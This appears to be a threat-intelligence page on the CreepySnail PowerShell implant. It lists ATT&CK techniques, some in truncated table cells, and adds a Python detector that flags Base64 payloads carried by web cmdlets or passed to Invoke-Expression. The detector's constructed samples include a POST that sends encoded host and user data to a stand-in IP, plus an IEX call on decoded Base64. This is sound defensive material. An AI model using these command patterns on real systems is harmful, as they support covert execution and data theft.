CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | CreepySnail can use PowerShell for execution, including the cmdlets |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | CreepySnail can use HTTP for C2.[1] |
| Enterprise | T1132.001 | Data Encoding: Standard Encoding | CreepySnail can use Base64 to encode its C2 traffic.[1] |
| Enterprise | T1078.002 | Valid Accounts: Domain Accounts | CreepySnail can use stolen credentials to authenticate on target networks.[1] |
| Enterprise | T1033 | System Owner/User Discovery | CreepySnail can execute |
| Enterprise | T1016 | System Network Configuration Discovery | CreepySnail can use |
| Enterprise | T1041 | Exfiltration Over C2 Channel | CreepySnail can connect to C2 for data exfiltration.[1] |
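The table above lists three techniques that, taken together, describe the implant's C2 path: PowerShell execution (T1059.001), HTTP as the transport (T1071.001) and Base64 as the encoding (T1132.001). A practical way to hunt for that combination is to run PowerShell ScriptBlock logging (Event ID 4104) through a check that flags a web or dynamic-execution cmdlet carrying a decodable Base64 blob, and to decode the blob so the analyst sees what was sent. The following is an added detection example written for this page; it is not CreepySnail's code and the four log lines are constructed samples, not captured traffic. The cmdlet and regex patterns are a general heuristic for the technique set, not indicators taken from the implant.

```python
import base64
import binascii
import re

# Constructed sample PowerShell ScriptBlock text (Event ID 4104), written for
# this example. None of these lines is CreepySnail's actual code.
SAMPLE_SCRIPT_BLOCKS = [
    # benign: plain download, no encoded payload
    'Invoke-WebRequest -Uri "https://example.org/update.xml" -OutFile C:\\temp\\u.xml',
    # suspicious: web cmdlet POSTing a Base64 body (decodes to host/user recon output)
    'Invoke-WebRequest -Uri "http://203.0.113.10/p" -Method POST -Body "SE9TVD1XUzAxO1VTRVI9Y29ycFxqZG9l"',
    # suspicious: Base64-decoded string handed to Invoke-Expression
    'IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("R2V0LUNvbXB1dGVySW5mbw==")))',
    # benign: Base64 in a certificate operation, no web or exec cmdlet involved
    '$cert = [Convert]::FromBase64String("MIIB...")',
]

# Generic patterns (assumptions for this example, not CreepySnail indicators).
WEB_CMDLETS = re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget)\b", re.I)
EXEC_CMDLETS = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)
# A run of 16+ Base64 characters with optional padding, not glued to other
# Base64 characters on either side (so identifiers inside longer words are skipped).
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def decode_b64_tokens(line):
    """Return the printable UTF-8 plaintexts of every Base64 token in the line.

    Tokens that are not valid Base64, or that decode to non-text bytes, are
    dropped; that filters out identifiers such as FromBase64String that happen
    to match the character class.
    """
    decoded = []
    for match in B64_TOKEN.finditer(line):
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def assess_script_block(line):
    """Score one script block line for the PowerShell + HTTP + Base64 pattern."""
    reasons = []
    decoded = decode_b64_tokens(line)
    has_web = bool(WEB_CMDLETS.search(line))
    has_exec = bool(EXEC_CMDLETS.search(line))
    if has_web:
        reasons.append("web cmdlet present (T1071.001)")
    if has_exec:
        reasons.append("dynamic execution present (T1059.001)")
    if decoded:
        reasons.append("decodable Base64 payload (T1132.001)")
    # Base64 on its own is everywhere, and a web cmdlet on its own is routine.
    # The alert-worthy case is Base64 carried by a web cmdlet (an encoded C2
    # body) or fed to Invoke-Expression (an encoded command).
    suspicious = bool(decoded) and (has_web or has_exec)
    return {"suspicious": suspicious, "reasons": reasons, "decoded": decoded}


def scan(script_blocks):
    """Return (index, assessment) for every suspicious line in the input."""
    hits = []
    for index, line in enumerate(script_blocks):
        result = assess_script_block(line)
        if result["suspicious"]:
            hits.append((index, result))
    return hits


if __name__ == "__main__":
    for index, result in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"line {index}: {'; '.join(result['reasons'])}")
        for text in result["decoded"]:
            print(f"  decoded: {text!r}")
```

Run against the constructed samples, the two benign lines are ignored and the two suspicious ones are reported with their decoded payloads. Decoding the blob is the part that earns analyst time: a Base64 body that decodes to host and user names is the T1033/T1016 discovery output leaving over the T1041 channel, whereas one that decodes to a certificate is noise. The 16-character minimum and the validate/printable filters are tuning knobs; lower the minimum if you need to catch short beacons, at the cost of more false positives.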